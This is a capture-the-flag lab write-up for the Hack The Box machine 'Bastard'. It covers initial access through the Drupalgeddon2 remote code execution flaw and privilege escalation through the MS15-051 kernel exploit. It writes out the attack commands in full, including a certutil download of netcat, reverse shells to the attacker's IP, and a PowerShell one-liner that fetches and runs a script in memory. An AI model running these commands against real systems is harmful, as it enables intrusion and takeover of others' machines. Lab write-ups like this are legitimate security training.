Overview
Bastard is a Windows Server box running a content management system called Drupal. Drual 7.54 is vulnerable to CVE-2018-7600 which allows for remote code execution. Drupalgeddon was used to get the initial shell and kernel exploit (MS15-051) was used to escalate privileges to ‘nt authority/system’.
Enumeration
- Windows Server 2008 R2
- IIS 7.5
- php 5.3.28
- drupal 7.54
*Open Ports
nmap -vv -Pn -sT -A --osscan-guess -p- 10.10.10.9 -oN /mnt/data/boxes/bastard/_full_tcp_nmap.txt
- 80/tcp - http
- 135/tcp - Microsft Windows RPC
- 49154 - Microsoft Windows RPC
Steps (User)
Browsing to http://10.10.10.9 brought me to a drupal login page.
Checking http://10.10.10.9/robots.txt showed some interesting files including /CHANGELOG.txt which reveals the version of drupal that’s running.
Running a search against searchsploit for “drupal 7” shows multiple results, 3 of which apply to the version running on the box.I decided to go with drupalgeddon2.
drupalgeddon2 is an exploit written in ruby which provides a root shell (if vulnerable). I made one modification to the script, “tryphpshell = false”, because it appeared there was insufficient access to the web root.
./44449.rb http://10.10.10.9
I had to use dos2unix to convert the line endings of the file because it was throwing errors (dos2unix 44449.rb)
The web shell is pretty slow so I created a reverse shell with netcat. I copied the windows version of netcat to my local working directory, started a python http server in prepration to transfer files, and started a netcat listener (rlwrap nc -lvnp 4200).
Note: rlwrap fixes the arrow key functionality for windows reverse shells.
cp ~/tools/windows-binaries/nc.exe .
python3 -m http.server 80
I used certutil was used to copy netcat to the target box.
certutil -urlcache -split -f http://10.10.14.16/nc.exe
With netcat now on the box I ran the command to create a reverse shell and received a callback as ‘nt authority\iusr’
nc.exe -e cmd 10.10.14.16 4200
Steps (root/system)
Running systeminfo showed N/A for hotfixes so at this point I decided to run Sherlock and check for exploits.
I attempted this with Watson but unfortunately I was not able to compile it for .Net 2.0.
Sherlock.ps1 was copied to my working directory.
cp ~/tools/Sherlock/Sherlock.ps1 .
I then used Powershell Invoke-Expression (IEX) to pull sherlock.ps1 from my box and run it in memory, executing the Find-AllVuns function.
powershell -nop -exec bypass -c "iex (new-object net.webclient).downloadstring('http://10.10.14.16/Sherlock.ps1');Find-AllVulns"
Reviewing the results, the box appeared to be vulnerable to MS15-051 which can be downloaded from here https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051-KB3045171.zip
This may go without saying but use caution when downloading/using exploits from sites like this where you can’t view the source code to see what it’s doing.
ms15-051x64.exe was extracted to my working directory and copied to the target via the python http server using certutil.
certutil -urlcache -split -f http://10.10.14.16/ms15-051x64.exe
I set up a netcat listener (rlwrap nc -lvnp 4201) and ran the exploit providing my IP and port as parameters
ms15-051x64 -e cmd.exe 10.10.14.16 4201
A callback was received and I received a shell as nt authority/system